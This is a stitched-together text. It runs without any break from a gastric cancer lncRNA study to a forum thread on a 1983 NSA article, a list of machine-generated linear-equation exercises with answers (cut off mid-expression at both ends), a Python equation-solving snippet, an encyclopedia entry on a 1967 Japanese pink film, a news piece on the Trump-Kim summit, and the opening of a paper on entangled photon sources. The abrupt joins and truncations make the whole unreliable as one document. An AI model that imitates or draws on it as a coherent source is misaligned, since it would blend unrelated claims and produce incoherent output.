RT-qPCR was performed to detect the expression of PTCSC3 and Linc-pint in both cancer and paracancerous tissues of the 78 gastric cancer patients. Compared with paracancerous tissues, expression levels of PTCSC3 were significantly lower in cancer tissues ([Figure 1A](#F0001){ref-type="fig"}, p\<0.05). In addition, Linc-pint was also downregulated in cancer tissues compared with paracancerous tissues ([Figure 1B](#F0001){ref-type="fig"}, p\<0.05).Figure 1PTCSC3 and Linc-pint were both downregulated in cancer tissues of gastric cancer patients. RT-qPCR results showed that PTCSC3 (**A**) and Linc-pint (**B**) were both downregulated in cancer tissues of gastric cancer patients compared with paracancerous tissues (\*p\<0.05).
Low Levels of PTCSC3 and Linc-pint in Cancer Tissue Indicate Poor Survival {#S0003-S2002}
--------------------------------------------------------------------------
Based on the expression levels of PTCSC3 and Linc-pint in tumor tissues, patients were divided into high (n=36) and low (n=42) PTCSC3 level groups, as well as high (n=38) and low (n=40) Linc-pint level groups according to Youden's index. Survival curves were plotted by the Kaplan--Meier method and compared by log-rank test. As shown in [Figure 2A](#F0002){ref-type="fig"}, patients in the low PTCSC3 level group showed a significantly lower overall survival rate than patients in the high PTCSC3 level group. In addition, the overall survival rate of patients in the low Linc-pint level group was also significantly lower than that of patients in the high Linc-pint level group ([Figure 2B](#F0002){ref-type="fig"}).Figure 2Low levels of PTCSC3 and Linc-pint in cancer tissue indicate poor survival. Survival curve analysis of 5-year follow-up data showed that low levels of PTCSC3 (**A**) and Linc-pint (**B**) in cancer tissue indicate poor survival.
Expression Levels of PTCSC3 and Linc-pint Were Significantly Correlated in Cancer Tissues {#S0003-S2003}
-----------------------------------------------------------------------------------------
Correlations between expression levels of PTCSC3 and Linc-pint were analyzed by Pearson's correlation coefficient. It was observed that expression levels of PTCSC3 and Linc-pint were significantly and positively correlated in cancer tissues ([Figure 3A](#F0003){ref-type="fig"}). In contrast, the correlation between expression levels of PTCSC3 and Linc-pint was not significant in paracancerous tissues ([Figure 3B](#F0003){ref-type="fig"}).Figure 3Expression levels of PTCSC3 and Linc-pint were significantly correlated in cancer tissues. Pearson's correlation coefficient analysis showed that expression levels of PTCSC3 and Linc-pint were significantly correlated in cancer tissues (**A**) but not in paracancerous tissues (**B**).
PTCSC3 and Linc-pint Upregulated Each Other in Gastric Cancer Cells {#S0003-S2004}
-------------------------------------------------------------------
PTCSC3 and Linc-pint were overexpressed in cells of both the SNU-1 and Hs 746T cell lines to further investigate the interactions between PTCSC3 and Linc-pint ([Figure 4A](#F0004){ref-type="fig"}, p\<0.05). Compared with control (C) and negative control (NC), overexpression of PTCSC3 led to significantly upregulated Linc-pint expression in cells of both cell lines ([Figure 4B](#F0004){ref-type="fig"}, p\<0.05). In addition, overexpression of Linc-pint also mediated the upregulation of PTCSC3 in those cells ([Figure 4C](#F0004){ref-type="fig"}, p\<0.05).Figure 4PTCSC3 and Linc-pint upregulated each other in gastric cancer cells. Overexpression of PTCSC3 and Linc-pint was achieved in cells of both the SNU-1 and Hs 746T cell lines at 24 h after transfection (**A**). Overexpression of PTCSC3 led to significantly upregulated Linc-pint expression in cells of both cell lines (**B**). In addition, overexpression of Linc-pint also mediated the upregulation of PTCSC3 in those cells (**C**) (\*p\<0.05).
PTCSC3 and Linc-pint Regulated Gastric Cancer Cell Proliferation and Stemness {#S0003-S2005}
-----------------------------------------------------------------------------
Compared with control (C) and negative control (NC), overexpression of PTCSC3 and Linc-pint led to significantly inhibited proliferation ([Figure 5A](#F0005){ref-type="fig"}) and decreased percentage of CD133+ cells ([Figure 5B](#F0005){ref-type="fig"}) (p\<0.05). Linc-pint siRNA played an opposite role and attenuated the effects of PTCSC3 overexpression on cancer cell proliferation and stemness (p\<0.05).Figure 5PTCSC3 and Linc-pint regulated gastric cancer cell proliferation and stemness. Overexpression of PTCSC3 and Linc-pint led to significantly inhibited proliferation (**A**) and decreased percentage of CD133+ cells (**B**). Linc-pint siRNA played an opposite role and attenuated the effects of PTCSC3 overexpression on cancer cell proliferation and stemness (\*p\<0.05).
Discussion {#S0004}
==========
LncRNAs are critical determinants in cancer biology, while the function of most lncRNAs remains unknown. The key finding of the present study is that PTCSC3 and Linc-pint, two lncRNAs, play a tumor-suppressive role in gastric cancer by forming a positive feedback regulation circle.
Survival of advanced gastric cancer patients is still poor.[@CIT0013] Therefore, development of novel prognostic markers is always needed to design individualized post-surgery treatment and care strategies. Some prognostic markers, such as the ImmunoScore signature,[@CIT0014] have shown potential for clinical application. Our study identified PTCSC3 and Linc-pint as two promising prognostic biomarkers for gastric cancer. RNA expression detection is an easy disease prediction approach and may be superior to most other approaches in terms of time and cost. However, more clinical studies are needed to further verify the clinical value of these two lncRNAs.
LncRNAs regulate gene expression at different levels, such as methylation and posttranscriptional and translational regulation.[@CIT0015],[@CIT0016] However, interactions between different lncRNAs are largely unknown. In the present study, we showed that PTCSC3 and Linc-pint may form a positive feedback regulation circle in gastric cancer, and that this positive feedback regulation is involved in the regulation of gastric cancer cell proliferation and stemness. Interestingly, no significant correlation between expression levels of PTCSC3 and Linc-pint was observed in paracancerous tissues. Therefore, certain pathological factors may be involved in mediating the feedback regulation between PTCSC3 and Linc-pint.
It is also worth noting that Linc-pint silencing only partially attenuated the inhibitory effects of PTCSC3 overexpression on cancer cell proliferation and stemness. Therefore, PTCSC3 may interact with multiple factors to participate in the pathogenesis of gastric cancer. Rather than acting through a single lncRNA--lncRNA interaction, PTCSC3 is more likely a component of a larger regulatory network. More studies are needed to further characterize this network. In this study, we only used the CD133+ marker to analyze cancer cell stemness. Our future studies will include more stemness markers to further verify our conclusions.
Conclusion {#S0005}
==========
In conclusion, PTCSC3 and Linc-pint are downregulated in gastric cancer. PTCSC3 and Linc-pint may suppress gastric cancer by forming a positive feedback regulation circle that inhibits cancer cell proliferation and reduces cell stemness.
Data Sharing Statement {#S0006}
======================
The analyzed data sets generated during the study are available from the corresponding author on reasonable request.
Ethics Approval and Consent to Participate {#S0007}
==========================================
The present study was approved by the Ethics Committee of Fourth Hospital of Hebei Medical University. The research has been carried out in accordance with the World Medical Association Declaration of Helsinki. All patients provided written informed consent prior to their inclusion within the study.
Author Contributions {#S0008}
====================
All authors contributed to data analysis, drafting and revising the article, gave final approval of the version to be published, and agree to be accountable for all aspects of the work.
Disclosure {#S0009}
==========
The authors report no conflicts of interest in this work.
The Silent Power of the NSA (1983) - shalmanese
http://www.nytimes.com/1983/03/27/magazine/the-silent-power-of-the-nsa.html?pagewanted=all
======
stevewillows
The last paragraph tells the tale of why this article has emerged again.
"No laws define the limits of the N.S.A.'s power. No Congressional committee
subjects the agency's budget to a systematic, informed and skeptical review.
With unknown billions of Federal dollars, the agency purchases the most
sophisticated communications and computer equipment in the world. But truly to
comprehend the growing reach of this formidable organization, it is necessary
to recall once again how the computers that power the N.S.A. are also
gradually changing lives of Americans - the way they bank, obtain benefits
from the Government and communicate with family and friends. Every day, in
almost every area of culture and commerce, systems and procedures are being
adopted by private companies and organizations as well as by the nation's
security leaders that make it easier for the N.S.A. to dominate American
society should it ever decide such action is necessary."
**2 - i*t**2 + 0. Let m be g(12). Solve -m*s = -2*h + 3*h - 1, 11 = s + 4*h for s.
-1
Let x be 0*(24/9 + (-45)/15). Solve x = -f + 3*o - 20, -3*o + 6*o - 10 = -f for f.
-5
Suppose 4*x - 2*p - p - 17 = 0, 3*x - 9 = p. Solve -x*z + 23 = -5*y + 3, 3*y + 4*z + 12 = 0 for y.
-4
Let x(b) = -b + 11. Let s be x(11). Solve 8*u - 3*u = -20, s = -3*h - 4*u - 1 for h.
5
Suppose 4*x = 5*l - 25, 65*l - 67*l - 13 = 3*x. Solve a = -4*f + 7, l = -2*a + f - 3 for a.
-1
Let v be (-10)/(-40) + 22/8. Let y be 35/(-14)*2*1. Let b be (-4 + 1 - y)/1. Solve -5*c - 7 = v*l, 2*c - b*l - 11 = -c for c.
1
Let u be 0/((1 + 1)/(-4 - -2)). Suppose 5*g + 3*s = 20 + 14, 2*s + 4 = 0. Let m be u + 3 - g/(-4). Solve -3*k + m = 4*h, 4*k = -5*h + 5 - 0 for k.
-5
Suppose -15 = -3*j - 2*j. Solve 5*a = 5*t + 5, -2*a + 7*t = j*t - 4 for a.
0
Let t(b) = 16*b**2. Let h be t(1). Suppose 3*q + h = 5*q. Suppose 5*r - 8 = -2*c, -2*r + 5*c + q + 1 = 0. Solve -4*a + 24 = -3*a - 5*o, -r*o = 10 for a.
-1
Suppose 13 = 4*t + 9. Solve 3*m = -2*m - 5*b - 5, -m - 3*b - t = 0 for m.
-1
Let l(v) = -2*v**2 - 9*v - 8. Suppose -k + 5*r = 0, -2*k + 5*r - 7 = -2. Let z be l(k). Let f = -13 - z. Solve 2*o - 9 = -3*x - f*o, 0 = -3*x + 3*o + 9 for x.
3
Let q(i) = -2*i**3 + 28*i**2 - 26*i + 8. Let o be q(13). Solve -3*g - o + 0 = 4*n, 0 = -3*n - 3*g - 3 for n.
-5
Let b(h) = h + 26. Let x be b(-17). Suppose -2*g - 5 = -x. Solve 0 = 5*o - 4*s - 4, -g*o + s - 5 = 6*s for o.
0
Let q = -1377 - -1383. Solve -q*s - 20 = -s - 3*o, s - 14 = -3*o for s.
-1
Suppose 4*r - 17 = -5*x - 33, 3*x - r - 4 = 0. Solve x = 2*u - m + 1, -5*u + 2 + 3 = 5*m for u.
0
Let y = -30 + 54. Suppose -y = -7*n + 4. Solve -n*b - 5*h = 11, -5*b + h - 19 = 2*h for b.
-4
Suppose -35*z = -9*z - 52. Solve 3*f - z = -4*q - 21, 4*q = f + 1 for q.
-1
Suppose 6*c - 19 = 29. Suppose c = 3*t - 1. Solve 0*i - 4 = 4*i - t*k, -i - 4*k = 1 for i.
-1
Let y(l) = -2*l**3 + 3*l**2 + 2*l - 3 + 0 + l**3. Let x = 135 + -133. Let m be y(x). Solve 20 = m*u, 0 = j - 5*j + 2*u - 24 for j.
-4
Let d be 0*5/15 + 5. Let f be (-1 - -4 - -1)*d. Solve -i = -4*b - f, b - 2*i + 0 + 12 = 0 for b.
-4
Let c = 7 - 28. Let u = c - -65. Suppose 5*g - 16 = l - u, 2*g = 2*l - 16. Solve -w - 15 = 3*b, 2*w + 3*b = l*w - 15 for w.
0
Suppose 3*j + 2*j = 15. Suppose 0 = -2*h + h - j*l - 7, -4*h = 5*l + 14. Let b be 1/h*1 + 22. Solve 5*g = g + 5*d - b, -5*d = 3*g + 7 for g.
-4
Let w = -160 - -163. Solve 4*x = -w*j + 2*x, 2*j - 2*x = -10 for j.
-2
Let f be 12 + (-9)/((-27)/(-12)). Let o be 0 + (1 - 3*3). Let h be f - (-1 + o/(-2)). Solve 6 = -4*w + 4*x + x, -h*w - x + 7 = 0 for w.
1
Suppose -11*s - 3*a + 21 = -8*s, 2 = -4*s + 2*a. Solve -p = 2*n - 5, s*p - 25 = -5*n - 3*p for n.
0
Suppose 0 = -3*f + 61 - 55. Solve 0*v + 4*x - 22 = -v, f*v - 14 = -2*x for v.
2
Let v = -19 + 21. Solve -5*k = 4*z - 4, -4*z - v + 6 = 4*k for k.
0
Let c(g) = -g + 1. Let d be c(1). Suppose -i - 3 = -4*j + 2, d = -3*j + 12. Solve -4*p + 0*p = -5*s + 6, -5*p = 3*s - i for p.
1
Suppose -2*s + 6 = 0, 2*s + 24 = 3*u + 7*s. Solve -20 = 4*v + u*r, 3*v + 5 + 10 = r for v.
-5
Let n be (42/15)/(-7) - (-358)/(-5). Let u = -69 - n. Solve -2*l - 5 = 3*y, u*y - y = -l - 5 for y.
-5
Let t(x) = -x**2 + 10*x + 20. Let q be t(12). Let l = 7 + q. Solve 4 = z + l*b, 5*z + b = 5*b + 20 for z.
4
Let a(b) = -b**2 + 8*b + 88. Let t be a(14). Solve 0 = -j - f, -5*j + t = -3*j + 4*f for j.
-2
Suppose -2*y = -1 - 1. Let d = 3 - 11. Let p be (2/2)/((-4)/d). Solve 5*g = -t + 18, -p*g - 8 = -5*t + y for t.
3
Let m = -786 + 788. Solve 2*u = -2*y - 8, -m*y + 3 = -3*u + 1 for u.
-2
Suppose -37*p + 28*p + 45 = 0. Solve p*i = -10, i - 7 = 5*j + 1 for j.
-2
Let u(w) = w**2 + 3*w + 2. Let z be u(-1). Suppose 5*f + i - 15 = z, -2*f = -i - 3*i - 6. Solve 3*t = -0*m - m + 2, -4*t - 4 = f*m for m.
-4
Suppose y = 4*g + 3*y - 2, 4*y + 4 = -4*g. Solve -3*h + 1 = 2*b + 5, g*h = -5*b + 1 for b.
1
Let q be (-27)/6*(-4)/6. Suppose -4*b + 13 + 9 = 2*p, 5*p - 4*b = 83. Suppose 0 = -25*r + 20*r + p. Solve -r*s + 7 = -2*d, q*d = 2*d - 2*s for d.
-2
Let z(d) = 4*d - 15. Let c be z(5). Let k be (-5 + c/1)/(-1). Solve -12 = 2*r + 2*r - 4*q, -4*q = k for r.
-3
Suppose 0 = -3*y + 5*y - 12. Let w = -3 - y. Let c be 18/12 + w/(-2). Solve z + c = o, -o - z = -5*z - 21 for o.
1
Suppose 0 = 2*k + 3*f + 7, 5*f + 2 + 35 = 3*k. Solve 2*o - 3*j - 7 = 0, k*o - 2 + 13 = j for o.
-4
Let j(c) = -c + 18. Let l be j(6). Suppose -2*i = i - l, -i + 18 = 2*z. Solve -3*k + 4*u + 6 = 0, 2*k - 2*u = -z*u + 4 for k.
2
Let x be (-1)/(-4) + 10*15/(-24). Let d(r) = r**2 - r + 1. Let s(n) = -5*n + 13. Let p(u) = d(u) - s(u). Let t be p(x). Solve 2*h + 2*y = t, 0 = -y + 2 for h.
-2
Let j be (-2 - -9)*((-228)/42 - -6). Solve 3*a + j = 5*d, 4*a - 5 = -2*d + 7 for d.
2
Suppose -35*z = -31*z - 12. Let r = 40 - 31. Solve -2*g - i = -r, 5*i = -4*g + z*g for g.
5
Suppose 33*f - 12 - 87 = 0. Solve -3*b = -2*u - 15, f*u + 21 = -0*u + 4*b for u.
-3
Suppose -5*q + 3*m + 6 = 0, 25*q - 20*q = -4*m + 27. Let f = 30 + -22. Solve -q*c = a - f, -5*c + 0*a = -a for c.
1
Suppose 0 + 0 = 10*m. Let l(z) = 3 + 2*z + 0*z - z. Let u be l(m). Solve -u*g - 2*g + 15 = -5*h, 4*g = 3*h + 9 for h.
-3
Let m(c) = 5*c**2 + 3. Let s be m(2). Solve 5*n = r - s, -2*n - 2*n - 28 = -4*r for n.
-4
Let d(n) = 1. Let c(w) = -w**2 + 8*w + 14. Let v(q) = c(q) - 2*d(q). Let r be v(9). Solve -3*j + 20 = -7*j, -r*h = j + 2 for h.
1
Suppose -222 = -0*o - 6*o. Let h(a) = -a**2 + 12*a - 19. Let c be h(13). Let s = o + c. Solve -i - 8 = 3*r, 2*i - s*r = 4*i + 15 for i.
-5
Let w(p) = p + 11. Let h be w(-9). Suppose 6*l = h + 64. Let d = 16 - l. Solve d*z - 25 = 0, 5*z = 5*t - 0*t + 30 for t.
-1
Let t(a) = -14*a + 58. Let q be t(4). Solve q*m = 3*h - 4 - 9, -4*h + 6 = 3*m for h.
3
Let l = 9 - 10. Let j be l/(((-4)/20)/(-1)). Let h = j + 6. Solve -3*z - 5*r + h = 3, 0 = 5*z + 3*r + 14 for z.
-4
Suppose -57*w - 4*g - 16 = -59*w, -4*g - 10 = w. Solve -23 + 6 = w*n + 3*b, -b = -5*n - 17 for n.
-4
Suppose -9*f = -5*f - 20. Suppose f*m + 3 = 118. Let d = m + -19. Solve -4 = p - 5*p + d*v, p + 3*v = 5 for p.
2
Let l(z) = 6*z**2 + 2*z - 3. Let d be l(1). Solve 0 = 5*w + 10, -11 = d*j - 0*w + 3*w for j.
-1
Let j = 299 - 288. Solve -3*f = 2*f + 3*q - 37, -3*f + q + j = 0 for f.
5
Suppose -3*n + 5*x + 27 = 0, n - x = 2*x + 9. Let v = 12 - n. Solve 3*z = 2*k - v, -3*k + 2*z = 4*z + 15 for k.
-3
Let f(n) be the second derivative of n**3/6 - 5*n**2/2 + 4*n. Let k be f(7). Let m be (-4 + 16 + -4)/k. Solve m*i + 2*q = 18, 25 = -i + 6*i + 3*q for i.
2
Let d(q) = -q**2 - 15*q + 233. Let z be d(9). Solve 4*w + 26 = -4*b + 6*b, -3*w + b = z for w.
-4
Let a(m) = -m**2 + 2*m + 9. Let h be a(9). Let l be (-29)/9 - 12/h. Let q = l - -7. Solve q*g + 4 = -z, 2*z + 7 = 3*g + 21 for z.
4
Let m(d) = -d**2 + 5*d. Let k be m(4). Suppose 4*i - 30 = -2*v, k*i + i = 2*v + 15. Let h = v - 1. Solve 0 = j + 3*s - 2, -3*j - 4*s + 7 = -h for j.
5
Suppose 0 = d + q, -3*q - 5 = -2*d + 15. Suppose -2*u = -u - d. Suppose 4*z = -0*z + 8. Solve -3*v = b + u, v - 6 = z*v + 5*b for v.
-1
Let q(c) = -c**2 + 21*c + 52. Let a be q(23). Solve 0 = 4*u + 2 + a, -5*u = 2*t + 18 for t.
-4
Suppose 5*l + 40 = 4*u + l, -4*l = 0. Let d(z) = z**2 - 10*z + 3. Let c be d(u). Solve 0 = -2*r - 5*x - 4 - c, -2*r = -x + 1 for r.
-1
Suppose -297*a - 9 = -4*k - 302*a, -k + 2*a = -12. Solve -4*d + 22 = -4*z - k*d, -4*z - 5*d = 25 for z.
-5
Suppose 54*w + 15 = 51*w. Let t(g) = 15*g + 45. Let f(o) = -7*o - 22. Let v(h) = 5*f(h) + 2*t(h). Let y be v(w). Solve -11 = x + 2*d, d = -y*x - 4*d - 35 for x.
-3
Let r(x) = x**3 - 10*x**2 - 6*x - 40. Let h be r(11). Solve 0 = -3*b, -3*b = -3*g - 6*b + h for g.
5
Suppose -2*j = 9 - 1. Let u be (-1 - -19)/((-6)/j). Let v be (8/(-10))/(2/(-5)). Solve -3*h + 4*f = -14, u = -0*h - h - v*f for h.
-2
Let l be (-2)/(-12) + (-290)/(-60) + -5. Solve l = -3*r - 2*r - 5*n + 20, 0 = 2*r + 4*n - 8 for r.
4
Let j(d) = d**2 + 1. Let q be j(-1). Suppose -s = q*s + u - 24, -40 = -5*s - 4*u. Suppose -5*r - 15 = -s*r. Solve 4*f - 19 = -r*z, 2*z - 4*f + 2 - 4 = 0 for z.
3
Suppose -4 = 10*l - 4. Suppose -7*s + l*s = 0. Solve s = -5*w + 10, 6 = -3*b + w + 1 for b.
-1
Suppose -364*r = -350*r - 112. Solve -r*f + 9*f + 1 = q, 0 = 5*q - 5 for f.
0
Let m(b) = b**3 + 1 - b - 5*b - 4*b**2 + 9 - 1. Let q
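Each exercise above reduces to a pair of linear equations in two unknowns, which can be checked mechanically with Cramer's rule. As a minimal sketch in pure Python (exact arithmetic via `fractions`), applied to the second problem in this list, where x = 0, so the system rearranges to -f + 3*o = 20 and f + 3*o = 10:

```python
from fractions import Fraction

def solve2(a1, b1, c1, a2, b2, c2):
    """Solve a1*x + b1*y = c1 and a2*x + b2*y = c2 by Cramer's rule."""
    det = a1 * b2 - a2 * b1
    x = Fraction(c1 * b2 - c2 * b1, det)
    y = Fraction(a1 * c2 - a2 * c1, det)
    return x, y

# "Solve x = -f + 3*o - 20, -3*o + 6*o - 10 = -f for f" with x = 0
# rearranges to -f + 3*o = 20 and f + 3*o = 10:
f, o = solve2(-1, 3, 20, 1, 3, 10)
# f == -5, matching the listed answer
```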
Memoirs of Modern Love: Curious Age
Memoirs of Modern Love: Curious Age, also known as Contemporary Dictionary of Love: Age of Curiosity, is a 1967 Japanese pink film directed by Shin'ya Yamamoto and featuring Naomi Tani in one of her earliest starring roles.
Synopsis
While an obscene audio tape is played, a young woman has sex. She becomes obsessed with the recording and can only achieve orgasm if she is listening to it. Complications ensue when her boyfriend becomes troubled by the tape and is unable to perform sexually while it is being played.
Cast
Naomi Tani
Yumiko Matsumoto
Miki Hayashi
Background and critical appraisal
Director Shin'ya Yamamoto filmed Memoirs of Modern Love: Curious Age for Mamoru Watanabe's Watanabe Pro and it was released theatrically in Japan by Tōkyō Kōei in 1967. Yamamoto and star Naomi Tani worked together in other early pink films such as (also 1967) and (1968). They both later worked in Nikkatsu's Roman Porno films, but they did not work together in that series.
In their Japanese Cinema Encyclopedia: The Sex Films, Thomas and Yuko Mihara Weisser give Memoirs of Modern Love: Curious Age a rating of two-and-a-half out of four stars. They note that the plotline is "thin and ludicrous", and only an excuse for Tani to show her "primo body".
Category:1967 films
Category:Japanese films
Category:Japanese-language films
Category:Pink films
Over a series of months key experts prepared more than 20 papers for presentation to the president. Academics as well as CIA analysts were drafted for the effort. At one point, recalled one of the administration’s top Soviet affairs specialists, Jack Matlock, “we could get two or three two-hour sessions with [Reagan] a week! Try to get 15 minutes with any other president.” This is not Donald Trump’s way. The talks between Trump and Kim came about after Trump accepted the latter’s invitation on a whim during a phone call without the input of his advisors. "Meeting being planned!" tweeted Trump early one March morning. US President Donald Trump tweeted the news that a meeting with North Korea was being planned. Credit:Bloomberg
The current US State Department has been hollowed out and stripped of key staff and funding by the administration. Its new leader, the former CIA chief Mike Pompeo, has been in place for little more than a month. His replacement at the CIA, Gina Haspel, was confirmed on May 18. An ambassador to South Korea was announced in April, when Harry Harris, who had been bound for Australia, was redirected in haste. Trump’s new national security advisor, John Bolton, has long advocated for war with North Korea, and Politico has noted that in his first two months on the job he did not even call a cabinet-level planning meeting to discuss the talks. Nor is the President known for his enthusiasm for painstaking preparation. Breaking with tradition, Trump does not read the daily intelligence briefings prepared for him by his agencies as it does not suit his preferred “style of learning”, The Washington Post has reported. Speaking to reporters before a White House meeting with Japanese Prime Minister Shinzo Abe, Trump said: “I don't think I have to prepare very much. It's about attitude. It's about willingness to get things done.”
North Korean leader Kim Jong-un is due to travel to Singapore for the meeting. Credit:AP Trump’s approach has prompted concern in some quarters. John McLaughlin, former acting director of the CIA, told the Post’s conservative commentator - and frequent Trump critic - Jennifer Rubin, that he doubted Trump’s team. “These people have never been in a real negotiation … and have no idea how complicated this will be.” “Even in the hands of the most astute diplomats and serious presidents,” wrote Rubin, “this meeting would be a daunting proposition; in the hands of the Trump crew, the prospect of face-to-face meetings is, candidly, petrifying.” One man who does know exactly how complicated it is to negotiate with North Korea is Robert Carlin, a former CIA analyst and US State Department official who is currently a scholar with Stanford University’s Centre for International Security and Cooperation. Carlin has perhaps spent more time in face-to-face negotiations with North Korean officials than any other American. Carlin disputes the view of some US observers that negotiation with North Koreans is pointless. In a paper for the Centre for International Security and Cooperation published in 2008, Carlin wrote that US officials spent thousands of hours of often fruitful negotiation with North Korea between 1993 and 2000, before the relationship again frayed. He lamented that the lessons of those negotiations had been forgotten by American officials, to the detriment of US national security.
Recalling those talks in a recent interview with the American journal National Review, Carlin said he believes there is a possibility of a breakthrough in the coming talks. He argued that despite the lack of painstaking preparation, there were reasons for optimism, especially since talks had taken place between Pompeo and Kim.

"We're much better off than we were at the beginning of the year, when no one we knew or trusted had direct experience with Kim Jong-un," he wrote. "We were trapped in our own bubble of ignorance. Now several people have met with Kim, and the President will have the benefit of first-hand observations on the North Korean leader."

Carlin described North Korean negotiators as tough but careful, reports The New Republic. "They are good at their game … When they get precise in their presentation, it's important to pay attention — they mean what they say. But it's often only possible to understand what they mean by having a good grasp of their previous positions ... My experience is that Americans sometimes don't recognise progress when they see it from the North Koreans, and thus may miss openings."
He said the North Korean negotiators would also be alert to signs of disrespect. "When what we are asking for flows from our sense of moral superiority rather than any pragmatic or rational basis, the North Koreans can sense it. They have good emotional radars and know when we are being condescending, speaking down to them."

And he warned that they would prosecute their case rigorously. "If we leave gaps, we can be sure they will explore them. If there are seams, they will play them. If they are uncertain about our own commitment, they will pursue hedging."

Donald Trump and Kim Jong-un are set to meet at the Capella Hotel on Sentosa Island in Singapore. Credit: AP
In a separate piece written for 38 North, a website for analysis of North Korea, Carlin wrote that North Koreans are pragmatic negotiators who follow diplomatic norms. "A productive set of negotiations with them follows a pattern found anywhere in the world: Define the problem in terms that both sides can claim benefit from a solution; divide the problem into parts; move from easiest to hardest to solve; fix details and define terms; review again so that both sides understand what is and what isn't in the agreement; agree on implementation details and timetable."

He wrote that in talks with North Koreans, negotiators needed not only to be able to stand firm when they felt they had been slighted, but to be able to sit patiently and listen while North Korean officials voiced their own concerns. "Rarely do the North Koreans pound the table. More often, when we raise a point they find objectionable, they may quietly take off their glasses, close their notebooks gently, and lay their pens to the side."

The benefits of preparation, Carlin told National Review, are often to be felt in the wake of talks rather than at the table.
---
abstract: 'Generating nonclassical states of photons such as polarization entangled states on a monolithic chip is a crucial step towards practical applications of optical quantum information processing such as quantum computing and quantum key distribution. Here we demonstrate two polarization entangled photon sources in a single monolithic semiconductor waveguide. The first source is achieved through the concurrent utilization of two spontaneous parametric down-conversion (SPDC) processes, namely type-0 and type-I SPDC processes. The chip can also generate polarization entangled photons via the type-II SPDC process, enabling the generation of both co-polarized and cross-polarized entangled photons in the same device. In both cases, polarization entanglement is generated directly on the chip without the use of any off-chip compensation, interferometry or bandpass filtering. This enables direct, chip-based generation of both Bell states $(|H,H\rangle+|V,V\rangle)/\sqrt{2}$ and $(|H,V\rangle+|V,H\rangle)/\sqrt{2}$ simultaneously utilizing the same pump source. In addition, based on compound semiconductors, this chip can be directly integrated with its own pump laser. This technique ushers in an era of self-contained, integrated, electrically pumped, room-temperature polarization entangled photon sources.'
author:
- Dongpeng Kang
- Minseok Kim
- Haoyu He
- 'Amr S. Helmy'
title: Two Polarization Entangled Sources from the Same Semiconductor Chip
---
Introduction
============
Entangled photons are essential building blocks for optical quantum information processing, such as quantum computing (QC) [@Ladd_Nature_2010] and quantum key distribution (QKD) [@Gisin_RMP_2002]. Conventionally, entangled photons have been generated using a myriad of techniques, most notably by using the process of spontaneous parametric down-conversion (SPDC) utilizing second order nonlinearities in crystals [@Christ_2013]. Properties such as brightness, scalability, compact form-factor and room temperature operation play key roles in enabling us to fully profit from entangled photon sources in applications such as QC and QKD. As such, the physics and technology of generating and manipulating entangled photons in monolithic settings have recently been topics of immense interest. Harnessing such effects in a monolithic form-factor also enables further incorporation of other photonic components that may be necessary for the aforementioned applications [@O'Brien_NP_2009; @Gaggero_APL_2010; @Silverstone_NP_2014; @Jin_PRL_2014]. This provided the drive that motivated the early work on implementing entangled sources in waveguides of crystals with appreciable second order nonlinearities such as Lithium Niobate [@Suhara_LPR_2009].
Realizing entangled photon sources in monolithic settings enables much more than the inclusion of numerous necessary components simultaneously: It can enable the direct generation of novel and useful photonic quantum states with specified properties, without moving parts, while benefiting from the accurate alignment of nano-lithography, precision of epitaxial growth and thin film deposition techniques. For example, monolithic platforms offer opportunities to provide photons that are entangled in one or several degrees of freedom simultaneously without the need for any extra component on the chip [@Zhukovsky_OL_2011; @Kang_PRA_2014]. In addition, monolithic sources can offer significant control over the spectral-temporal properties of the entangled photons with relative ease and high precision [@Abolghasem_OL_2010]. This in turn provides a powerful tool for tailoring the temporal correlation or the spectral bandwidth of the photon states. Such states can be of extremely short correlation times, which can enhance the accuracy of protocols for quantum positioning and timing [@valencia1] and the sensitivity offered by quantum illumination [@lloyd1]. The same integrated sources can generate states with extremely large temporal correlation times. This in turn leads to narrow spectral bandwidth, which can provide a more efficient atom-photon interface and improved sources for long-haul QKD [@Narrowband_Sauge].
The vast majority of the aforementioned applications use polarization entangled photon sources. Entanglement in the polarization degree of freedom has been the most widely utilized to implement entangled sources for experiments and applications that probe or exploit quantum effects. Photon pairs in polarization entangled sources need to be indistinguishable in every degree of freedom, except for polarization, which is challenging to achieve for states produced directly in waveguides [@Suhara_LPR_2009; @Kaiser_NJP_2012; @Arahira_OE_2013]. For photon pairs generated in a type-II process, in which the down-converted photons are cross-polarized, the birefringence in the group velocities of the modes, where the photons propagate, will cause a temporal walk-off between the pair, allowing polarization to be inferred from the photon arrival time. On the other hand, for photon pairs generated in a type-0 or type-I process, where the photons in a pair are co-polarized, there is a lack of two orthogonal polarizations necessary for polarization entanglement. As a result, most waveguide sources of photon pairs require an off-chip compensation setup [@Kaiser_NJP_2012] or an interferometer [@Arahira_OE_2013] to generate polarization entanglement, which increases the source complexity and decreases the system stability significantly.
Recently, several techniques have been demonstrated to generate polarization entangled photons from a monolithic chip [@Matsuda_SR_2012; @Olislager_OL_2013; @Orieux_PRL_2013; @Horn_SR_2013]. The approaches which use spontaneous four-wave mixing (SFWM) in Si-based chips utilize integrated photonic components such as on-chip polarization rotators [@Matsuda_SR_2012] or 2D grating couplers [@Olislager_OL_2013], and benefit from mature fabrication technologies. However, the indirect bandgap of Si presents significant challenges for further integration with the pump lasers. To this end, III-V semiconductor material systems offer an optimal solution in terms of the functionality to tailor the dispersion and birefringence as well as monolithic integration with the pump lasers [@Bijlani_APL_2013; @Boitier_PRL_2014]. Techniques using the counterpropagating phase-matching (PM) scheme [@Orieux_PRL_2013] and modal PM in Bragg reflection waveguides (BRWs) [@Horn_SR_2013] based on AlGaAs have been demonstrated. In the former case, however, the requirement of two pump beams with strictly controlled incidence angles and beam shapes imposes a significant challenge for further integration, while in the latter case, the spectral distinguishability and walk-off due to modal birefringence compromise the quality of entanglement.
In this work, we demonstrate how the waveguiding physics associated with BRWs can be used to simultaneously produce two polarization entangled photon sources using alternative approaches in a single self-contained, room-temperature semiconductor chip. The waveguide structure utilized is schematically shown in Fig. \[Fig:structure\_SPDC\_SEM\](a). The chip, based on a single monolithic semiconductor BRW, is straightforward to design and implement and has no moving parts. The technique allows direct polarization entanglement generation using an extremely simple setup without any off-chip walk-off compensation, interferometer, or even bandpass filtering. The first source is achieved through the concurrent utilization of two second order processes, namely type-0 and type-I SPDC processes, pumped by a single waveguide mode [@Kang_OL_2012] as opposed to two modes of different polarizations [@Matsuda_SR_2012] or modes propagating in opposite directions [@Orieux_PRL_2013]. This approach permits the integration of the pump with the source in a monolithic form. Within the same waveguide, there exists a second source based on type-II process due to the lack of material birefringence [@Horn_SR_2013]. The virtual energy diagrams of 